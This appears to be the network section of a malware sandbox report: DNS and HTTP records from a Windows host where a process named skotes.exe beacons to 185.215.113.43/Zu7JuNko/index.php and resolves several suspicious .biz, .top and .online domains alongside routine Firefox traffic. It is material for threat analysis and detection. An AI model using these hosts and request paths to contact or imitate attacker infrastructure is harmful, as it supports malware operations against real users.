Dec 16, 2024 11:04:30.073896885 CET	192.168.2.5	1.1.1.1	0x6279	Standard query (0)	spocs.getpocket.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:31.150635958 CET	192.168.2.5	1.1.1.1	0xb1a7	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:31.152158022 CET	192.168.2.5	1.1.1.1	0x2171	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:31.152446985 CET	192.168.2.5	1.1.1.1	0xb28d	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:31.153851032 CET	192.168.2.5	1.1.1.1	0x11c5	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:31.226202011 CET	192.168.2.5	1.1.1.1	0x1782	Standard query (0)	content-signature-2.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:31.380852938 CET	192.168.2.5	1.1.1.1	0x4caf	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 16, 2024 11:04:31.383560896 CET	192.168.2.5	1.1.1.1	0xec94	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Dec 16, 2024 11:04:31.383963108 CET	192.168.2.5	1.1.1.1	0x5ead	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 16, 2024 11:04:31.519797087 CET	192.168.2.5	1.1.1.1	0x1509	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:31.521985054 CET	192.168.2.5	1.1.1.1	0x1ae4	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:31.660047054 CET	192.168.2.5	1.1.1.1	0x7c79	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 16, 2024 11:04:42.376451015 CET	192.168.2.5	1.1.1.1	0x2157	Standard query (0)	twentygr20sb.top	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:42.376508951 CET	192.168.2.5	1.1.1.1	0xbc2a	Standard query (0)	twentygr20sb.top	28	IN (0x0001)	false
Dec 16, 2024 11:04:45.313307047 CET	192.168.2.5	1.1.1.1	0xec91	Standard query (0)	home.twentygr20sb.top	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:45.313307047 CET	192.168.2.5	1.1.1.1	0x7bd	Standard query (0)	home.twentygr20sb.top	28	IN (0x0001)	false
Dec 16, 2024 11:04:45.577950001 CET	192.168.2.5	1.1.1.1	0x8b8f	Standard query (0)	home.twentygr20sb.top	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:45.577950001 CET	192.168.2.5	1.1.1.1	0x9bed	Standard query (0)	home.twentygr20sb.top	28	IN (0x0001)	false
Dec 16, 2024 11:04:45.578203917 CET	192.168.2.5	1.1.1.1	0x8b8f	Standard query (0)	home.twentygr20sb.top	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:45.578203917 CET	192.168.2.5	1.1.1.1	0x9bed	Standard query (0)	home.twentygr20sb.top	28	IN (0x0001)	false
Dec 16, 2024 11:04:45.578457117 CET	192.168.2.5	1.1.1.1	0x8b8f	Standard query (0)	home.twentygr20sb.top	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:45.578457117 CET	192.168.2.5	1.1.1.1	0x9bed	Standard query (0)	home.twentygr20sb.top	28	IN (0x0001)	false
Dec 16, 2024 11:04:45.703706026 CET	192.168.2.5	1.1.1.1	0xac9f	Standard query (0)	home.twentygr20sb.top	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:45.703802109 CET	192.168.2.5	1.1.1.1	0xa1e4	Standard query (0)	home.twentygr20sb.top	28	IN (0x0001)	false
Dec 16, 2024 11:04:45.703912973 CET	192.168.2.5	1.1.1.1	0xac9f	Standard query (0)	home.twentygr20sb.top	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:45.703963041 CET	192.168.2.5	1.1.1.1	0xa1e4	Standard query (0)	home.twentygr20sb.top	28	IN (0x0001)	false
Dec 16, 2024 11:04:45.710206985 CET	192.168.2.5	1.1.1.1	0xa1e4	Standard query (0)	home.twentygr20sb.top	28	IN (0x0001)	false
Dec 16, 2024 11:04:45.710583925 CET	192.168.2.5	1.1.1.1	0xac9f	Standard query (0)	home.twentygr20sb.top	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:55.783982992 CET	192.168.2.5	1.1.1.1	0x1c22	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:55.845484972 CET	192.168.2.5	1.1.1.1	0x1418	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 16, 2024 11:04:55.846343040 CET	192.168.2.5	1.1.1.1	0xc604	Standard query (0)	youtube.com	28	IN (0x0001)	false
Dec 16, 2024 11:04:55.851066113 CET	192.168.2.5	1.1.1.1	0x9a95	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Dec 16, 2024 11:04:56.064105034 CET	192.168.2.5	1.1.1.1	0x24c9	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 16, 2024 11:04:56.064951897 CET	192.168.2.5	1.1.1.1	0x1b32	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 16, 2024 11:04:57.213587999 CET	192.168.2.5	1.1.1.1	0x9a4a	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:05:24.683002949 CET	192.168.2.5	1.1.1.1	0x8288	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 16, 2024 11:05:25.348797083 CET	192.168.2.5	1.1.1.1	0x36cf	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Dec 16, 2024 11:05:25.483783960 CET	192.168.2.5	1.1.1.1	0x1a05	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 16, 2024 11:05:25.615338087 CET	192.168.2.5	1.1.1.1	0xb2fb	Standard query (0)	content-signature-2.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:05:25.821528912 CET	192.168.2.5	1.1.1.1	0xa5de	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:05:25.960105896 CET	192.168.2.5	1.1.1.1	0x9fe0	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 16, 2024 11:05:54.281155109 CET	192.168.2.5	1.1.1.1	0x7b48	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 16, 2024 11:05:55.411231041 CET	192.168.2.5	1.1.1.1	0x6223	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:05:55.549329042 CET	192.168.2.5	1.1.1.1	0x2d9b	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:05:55.728902102 CET	192.168.2.5	1.1.1.1	0xcccd	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:05:55.872076988 CET	192.168.2.5	1.1.1.1	0xe53a	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:05:56.075831890 CET	192.168.2.5	1.1.1.1	0x545b	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:05:56.840502977 CET	192.168.2.5	1.1.1.1	0xf38d	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:05:56.980819941 CET	192.168.2.5	1.1.1.1	0x13e9	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:05:57.159080982 CET	192.168.2.5	1.1.1.1	0xada0	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:05:57.300401926 CET	192.168.2.5	1.1.1.1	0xd1a7	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:06:00.354420900 CET	192.168.2.5	1.1.1.1	0x59c2	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:06:25.547517061 CET	192.168.2.5	1.1.1.1	0x6e45	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 16, 2024 11:06:25.831377983 CET	192.168.2.5	1.1.1.1	0x6e45	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 16, 2024 11:08:09.455549955 CET	192.168.2.5	1.1.1.1	0xd060	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:08:27.191910028 CET	192.168.2.5	1.1.1.1	0x4621	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 16, 2024 11:03:16.134664059 CET	1.1.1.1	192.168.2.5	0x6f43	Name error (3)	drive-connect.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:16.364366055 CET	1.1.1.1	192.168.2.5	0xf11d	Name error (3)	se-blurry.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:16.660958052 CET	1.1.1.1	192.168.2.5	0xf80d	Name error (3)	zinc-sneark.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:16.889182091 CET	1.1.1.1	192.168.2.5	0xaebd	Name error (3)	dwell-exclaim.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:17.682641983 CET	1.1.1.1	192.168.2.5	0x7b87	Name error (3)	formy-spill.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:17.906256914 CET	1.1.1.1	192.168.2.5	0x315f	Name error (3)	covery-mover.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:18.200721979 CET	1.1.1.1	192.168.2.5	0xb62	Name error (3)	dare-curbys.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:18.417232037 CET	1.1.1.1	192.168.2.5	0x15e8	Name error (3)	print-vexer.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:18.660111904 CET	1.1.1.1	192.168.2.5	0x187c	Name error (3)	impend-differ.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:18.807468891 CET	1.1.1.1	192.168.2.5	0x9f7e	No error (0)	steamcommunity.com		23.37.186.133	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:26.768887997 CET	1.1.1.1	192.168.2.5	0xfd31	No error (0)	httpbin.org		34.226.108.155	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:26.768887997 CET	1.1.1.1	192.168.2.5	0xfd31	No error (0)	httpbin.org		44.196.3.45	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:30.990607977 CET	1.1.1.1	192.168.2.5	0x7732	No error (0)	home.twentygr20sb.top		141.8.192.141	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:34.483546019 CET	1.1.1.1	192.168.2.5	0x716	No error (0)	home.twentygr20sb.top		141.8.192.141	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:43.675229073 CET	1.1.1.1	192.168.2.5	0xb239	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:45.920459032 CET	1.1.1.1	192.168.2.5	0x8e20	No error (0)	sedone.online		116.203.12.114	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:52.407103062 CET	1.1.1.1	192.168.2.5	0x57fb	No error (0)	tacitglibbr.biz		104.21.50.161	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:52.407103062 CET	1.1.1.1	192.168.2.5	0x57fb	No error (0)	tacitglibbr.biz		172.67.164.37	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:03:58.899024963 CET	1.1.1.1	192.168.2.5	0x3201	No error (0)	twentygr20sb.top		141.8.192.141	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:01.765096903 CET	1.1.1.1	192.168.2.5	0x2a77	No error (0)	twentygr20sb.top		141.8.192.141	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:03.791723013 CET	1.1.1.1	192.168.2.5	0x6705	No error (0)	www.google.com		172.217.21.36	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:03.791891098 CET	1.1.1.1	192.168.2.5	0xb39f	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 16, 2024 11:04:27.906409025 CET	1.1.1.1	192.168.2.5	0xf54d	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:28.048759937 CET	1.1.1.1	192.168.2.5	0x5f63	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:28.575242043 CET	1.1.1.1	192.168.2.5	0xb59e	No error (0)	youtube.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:28.583458900 CET	1.1.1.1	192.168.2.5	0x91	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:04:28.583458900 CET	1.1.1.1	192.168.2.5	0x91	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:28.713469982 CET	1.1.1.1	192.168.2.5	0x6805	No error (0)	youtube.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:28.725358963 CET	1.1.1.1	192.168.2.5	0xa5a0	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:28.855917931 CET	1.1.1.1	192.168.2.5	0x431	No error (0)	youtube.com			28	IN (0x0001)	false
Dec 16, 2024 11:04:28.866288900 CET	1.1.1.1	192.168.2.5	0xcccb	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net			28	IN (0x0001)	false
Dec 16, 2024 11:04:30.031332970 CET	1.1.1.1	192.168.2.5	0xca79	No error (0)	example.org		93.184.215.14	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:30.032219887 CET	1.1.1.1	192.168.2.5	0xd296	No error (0)	ipv4only.arpa		192.0.0.170	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:30.032219887 CET	1.1.1.1	192.168.2.5	0xd296	No error (0)	ipv4only.arpa		192.0.0.171	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:30.076374054 CET	1.1.1.1	192.168.2.5	0xeda8	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:04:30.076374054 CET	1.1.1.1	192.168.2.5	0xeda8	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:30.076720953 CET	1.1.1.1	192.168.2.5	0x40d8	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:30.184485912 CET	1.1.1.1	192.168.2.5	0x5660	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:04:30.184485912 CET	1.1.1.1	192.168.2.5	0x5660	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:30.211751938 CET	1.1.1.1	192.168.2.5	0x6279	No error (0)	spocs.getpocket.com	prod.ads.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:04:30.211751938 CET	1.1.1.1	192.168.2.5	0x6279	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:31.379741907 CET	1.1.1.1	192.168.2.5	0xb1a7	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:31.379751921 CET	1.1.1.1	192.168.2.5	0xb28d	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:31.379760981 CET	1.1.1.1	192.168.2.5	0x2171	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:31.379770994 CET	1.1.1.1	192.168.2.5	0x11c5	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:04:31.379770994 CET	1.1.1.1	192.168.2.5	0x11c5	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:31.379838943 CET	1.1.1.1	192.168.2.5	0x1782	No error (0)	content-signature-2.cdn.mozilla.net	content-signature-chains.prod.autograph.services.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:04:31.379838943 CET	1.1.1.1	192.168.2.5	0x1782	No error (0)	content-signature-chains.prod.autograph.services.mozaws.net	prod.content-signature-chains.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:04:31.379838943 CET	1.1.1.1	192.168.2.5	0x1782	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:31.657823086 CET	1.1.1.1	192.168.2.5	0x1509	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:04:31.657823086 CET	1.1.1.1	192.168.2.5	0x1509	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:31.659009933 CET	1.1.1.1	192.168.2.5	0x1ae4	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:31.798177004 CET	1.1.1.1	192.168.2.5	0x7c79	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net			28	IN (0x0001)	false
Dec 16, 2024 11:04:42.514143944 CET	1.1.1.1	192.168.2.5	0x2157	No error (0)	twentygr20sb.top		141.8.192.141	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:45.453835011 CET	1.1.1.1	192.168.2.5	0xec91	No error (0)	home.twentygr20sb.top		141.8.192.141	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:45.717272997 CET	1.1.1.1	192.168.2.5	0x8b8f	No error (0)	home.twentygr20sb.top		141.8.192.141	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:45.717494965 CET	1.1.1.1	192.168.2.5	0x8b8f	No error (0)	home.twentygr20sb.top		141.8.192.141	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:45.717719078 CET	1.1.1.1	192.168.2.5	0x8b8f	No error (0)	home.twentygr20sb.top		141.8.192.141	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:45.842360020 CET	1.1.1.1	192.168.2.5	0xac9f	No error (0)	home.twentygr20sb.top		141.8.192.141	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:45.842389107 CET	1.1.1.1	192.168.2.5	0xac9f	No error (0)	home.twentygr20sb.top		141.8.192.141	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:45.849045038 CET	1.1.1.1	192.168.2.5	0xac9f	No error (0)	home.twentygr20sb.top		141.8.192.141	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:55.921808004 CET	1.1.1.1	192.168.2.5	0x1c22	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:04:55.921808004 CET	1.1.1.1	192.168.2.5	0x1c22	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:55.983772039 CET	1.1.1.1	192.168.2.5	0xc604	No error (0)	youtube.com			28	IN (0x0001)	false
Dec 16, 2024 11:04:56.335230112 CET	1.1.1.1	192.168.2.5	0x967	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:04:56.335230112 CET	1.1.1.1	192.168.2.5	0x967	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:04:57.350860119 CET	1.1.1.1	192.168.2.5	0x9a4a	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:04:57.350860119 CET	1.1.1.1	192.168.2.5	0x9a4a	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:05:25.731585026 CET	1.1.1.1	192.168.2.5	0xdbb9	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:05:25.731585026 CET	1.1.1.1	192.168.2.5	0xdbb9	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:05:25.754234076 CET	1.1.1.1	192.168.2.5	0xb2fb	No error (0)	content-signature-2.cdn.mozilla.net	content-signature-chains.prod.autograph.services.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:05:25.754234076 CET	1.1.1.1	192.168.2.5	0xb2fb	No error (0)	content-signature-chains.prod.autograph.services.mozaws.net	prod.content-signature-chains.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:05:25.754234076 CET	1.1.1.1	192.168.2.5	0xb2fb	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:05:25.958950996 CET	1.1.1.1	192.168.2.5	0xa5de	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:05:54.279243946 CET	1.1.1.1	192.168.2.5	0x1d8d	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:05:54.279243946 CET	1.1.1.1	192.168.2.5	0x1d8d	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:05:55.548402071 CET	1.1.1.1	192.168.2.5	0x6223	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:05:55.548402071 CET	1.1.1.1	192.168.2.5	0x6223	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:05:55.686930895 CET	1.1.1.1	192.168.2.5	0x2d9b	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:05:55.686930895 CET	1.1.1.1	192.168.2.5	0x2d9b	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:05:55.867010117 CET	1.1.1.1	192.168.2.5	0xcccd	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:05:55.867010117 CET	1.1.1.1	192.168.2.5	0xcccd	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:05:56.012851954 CET	1.1.1.1	192.168.2.5	0xe53a	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:05:56.012851954 CET	1.1.1.1	192.168.2.5	0xe53a	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:05:56.212843895 CET	1.1.1.1	192.168.2.5	0x545b	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:05:56.212843895 CET	1.1.1.1	192.168.2.5	0x545b	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:05:56.979569912 CET	1.1.1.1	192.168.2.5	0xf38d	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:05:56.979569912 CET	1.1.1.1	192.168.2.5	0xf38d	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:05:57.118364096 CET	1.1.1.1	192.168.2.5	0x13e9	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:05:57.118364096 CET	1.1.1.1	192.168.2.5	0x13e9	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:05:57.299046040 CET	1.1.1.1	192.168.2.5	0xada0	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:05:57.299046040 CET	1.1.1.1	192.168.2.5	0xada0	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:05:57.478554010 CET	1.1.1.1	192.168.2.5	0xd1a7	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:05:57.478554010 CET	1.1.1.1	192.168.2.5	0xd1a7	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:06:00.647222042 CET	1.1.1.1	192.168.2.5	0x59c2	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:06:00.647222042 CET	1.1.1.1	192.168.2.5	0x59c2	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:06:25.902143002 CET	1.1.1.1	192.168.2.5	0x6e45	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net			28	IN (0x0001)	false
Dec 16, 2024 11:06:25.968465090 CET	1.1.1.1	192.168.2.5	0x6e45	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net			28	IN (0x0001)	false
Dec 16, 2024 11:08:09.592807055 CET	1.1.1.1	192.168.2.5	0xd060	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:08:09.592807055 CET	1.1.1.1	192.168.2.5	0xd060	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 16, 2024 11:08:27.437294960 CET	1.1.1.1	192.168.2.5	0x4621	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 11:08:27.437294960 CET	1.1.1.1	192.168.2.5	0x4621	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49772	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:03:03.817327023 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:03:05.156047106 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:03:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
